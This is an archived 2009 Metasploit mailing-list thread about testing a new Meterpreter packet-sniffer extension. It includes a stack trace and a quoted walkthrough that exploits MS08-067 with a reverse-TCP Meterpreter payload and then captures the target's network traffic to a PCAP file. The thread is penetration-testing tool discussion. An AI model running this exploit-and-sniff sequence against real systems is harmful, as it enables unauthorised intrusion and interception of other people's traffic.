Metasploit mailing list archives

Meterpreter Sniffer module

From: carlos_perez at darkoperator.com (Carlos Perez)
Date: Sat, 11 Jul 2009 11:23:57 -0400

where you running it on a vm in fusion? there are some steps that have to be
taken in fusin to let a VM sniff, the same with ESX and ESXi just in case

On Sat, Jul 11, 2009 at 10:51 AM, xyberpix <xyberpix at xyberpix.com> wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hey HD,

Just did a quick test, and it barfed on me, dunno though whether this is
the code, or my setup. Running on OS X 10.5.7, with Mac Port installed.

meterpreter > use sniffer
Loading extension sniffer...[-]
failure: No response was received to the core_loadlib request.
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/client_core.rb:157:in
`use'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:266:in
`cmd_use'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:254:in
`each'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:254:in
`cmd_use'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:234:in
`send'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:234:in
`run_command'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console.rb:94:in
`run_command'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:196:in
`run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:191:in
`each'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:191:in
`run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console.rb:60:in
`interact'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/shell.rb:123:in `call'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/shell.rb:123:in `run'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console.rb:58:in
`interact'
/Users/xyberpix/Tools/svn/trunk/lib/msf/base/sessions/meterpreter.rb:181:in
`_interact'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/interactive.rb:48:in `interact'
/Users/xyberpix/Tools/svn/trunk/lib/msf/ui/console/command_dispatcher/core.rb:997:in
`cmd_sessions'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:234:in
`send'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:234:in
`run_command'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:196:in
`run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:191:in
`each'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:191:in
`run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/shell.rb:127:in `run'
./msfconsole:82
meterpreter >


xyberpix


On 11 Jul 2009, at 15:38, HD Moore wrote:

 I committed a test version of the sniffer extension to the SVN trunk. The

module in SVN is compiled with debug support, so you should see lots of
verbose debug prints if you attach a debugger to the process where
meterpreter is running. I could use some help testing this new extension; so
far it looks like there are some cases where the "use sniffer" command fails
(exploiting ms03-026 on win2003 sp0), but there may be others as well.


To obtain the latest version of Metasploit on UNIX platforms:
 $ svn co https://metasploit.com/svn/framework3/trunk/

To obtain the latest version of Metasploit on Windows:
 1. Download https://metasploit.com/framework-3.3-dev.exe
 2. Execute this and extract the framework to a directory
 3. Inside the extracted directory execute msfupdate.bat
 4. Inside the extracted directory execute msfconsole.bat

This module uses the MicroOLAP (commercial) Packet Sniffer SDK (we have a
license), it can sniff packets from the target system without writing to the
filesystem or installing any drivers. The module automatically excludes its
own control traffic from the packet capture. As of this week, all Meterpeter
communication is now protected by TLS/SSL, including the packet sniffer
data.

To get started with the new module:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpeter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.120
msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (192.168.0.139:4444 ->
192.168.0.120:1687)

meterpreter > use sniffer
Loading extension sniffer...success.

meterpreter > help
[snip]
Sniffer Commands
================

  Command             Description
  -------             -----------
  sniffer_dump        Retrieve captured packet data
  sniffer_interfaces  List all remote sniffable interfaces
  sniffer_start       Capture packets on a previously opened interface
  sniffer_stats       View statistics of an active capture
  sniffer_stop        Stop packet captures on the specified interface

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true
dhcp:true wifi:false )

meterpreter > sniffer_start 1
[*] Capture started on interface 1 (200000 packet buffer)

meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 6 packets to PCAP file /tmp/all.cap

meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 31 packets to PCAP file /tmp/all.cap

The sniffer_dump command will append to an existing PCAP or create a new
one.

-HD
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (Darwin)

iEYEARECAAYFAkpYptUACgkQ0IPlrIA4qxpfUwCaAiLcu+nmcRSH3CT1wkHtdxE3
YzoAn3WFO5UJTcrejiIsoPswYTadzigN
=beiw
-----END PGP SIGNATURE-----

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090711/3b3ae5dd/attachment-0001.htm>

Current thread:

Meterpreter Sniffer module HD Moore (Jul 11)
- Meterpreter Sniffer module xyberpix (Jul 11)
  - Meterpreter Sniffer module HD Moore (Jul 11)
    - Meterpreter Sniffer module xyberpix (Jul 11)
    - Meterpreter Sniffer module HD Moore (Jul 11)
  - Meterpreter Sniffer module Carlos Perez (Jul 11)
    - Meterpreter Sniffer module xyberpix (Jul 11)
  - Meterpreter Sniffer module Carlos Perez (Jul 11)
- Meterpreter Sniffer module HD Moore (Jul 11)
  - Meterpreter Sniffer module xyberpix (Jul 12)
  - Meterpreter Sniffer module jep (Jul 13)
    - Meterpreter Sniffer module HD Moore (Jul 13)